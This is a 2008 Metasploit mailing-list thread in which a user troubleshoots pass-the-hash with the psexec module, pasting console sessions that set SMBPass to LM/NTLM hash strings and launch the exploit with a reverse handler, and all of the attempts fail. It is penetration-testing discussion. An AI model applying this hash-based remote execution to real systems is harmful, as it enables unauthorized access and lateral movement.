[framework] Using LM and NTLM Hashes with Metasploit's psexec

Mathew Brown mathewbrown at fastmail.fm
Fri Apr 11 22:21:56 CDT 2008 

Hi HD,
  Thank you for your reply, but I can't seem to get it to work.  Also,
  where would I get the NTLM response from?  I currently have the LM and
  NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
  but it failed.  I then tried it with just the NTLM hash and it also
  failed.  Finally, I tried it in the :NTLM: format and it failed. 
  Here's an example of what it tells me (the hash isn't really important
  since it's a test machine):

msf exploit(psexec) > set SMBPass
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
SMBPass =>
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
SMBPass => b9d2d4957b330b503cc792eb6a55bb1
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash
to use for authentication and you sending it a password?  In the example
above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
would psexec know that this was an NTLM hash and not a password?  Any
ideas?  Thanks for your help.

PS.  I'm currently running Metasploit v3.1.  After the failed attempts
above, I verified that psexec works fine when I provide it with the real
password and not the LM or NTLM hashes.

> On Friday 11 April 2008, H D Moore wrote:
> I think you can just set SMBPass to the NTLM response and call it done 
> (thanks grutz!).
> 
> -HD
> 
> On Friday 11 April 2008, Mathew Brown wrote:
> > Hi,
> >   After running info windows/smb/psexec in metasploit, it tells me:
> >   "This module uses a valid administrator username and password (or
> >   password hash) to execute an arbitrary payload."  I currently have
> > the LM and NTLM hashes for a valid account on a remote machine but not
> > the actual password.  How would I pass this information to the SMBPass
> > variable.  Should I just put it as LM:HASH?  Thanks.
> > --
> >   Mathew Brown
> >   mathewbrown at fastmail.fm
-- 
  Mathew Brown
  mathewbrown at fastmail.fm

-- 
http://www.fastmail.fm - The professional email service

More information about the Framework mailing list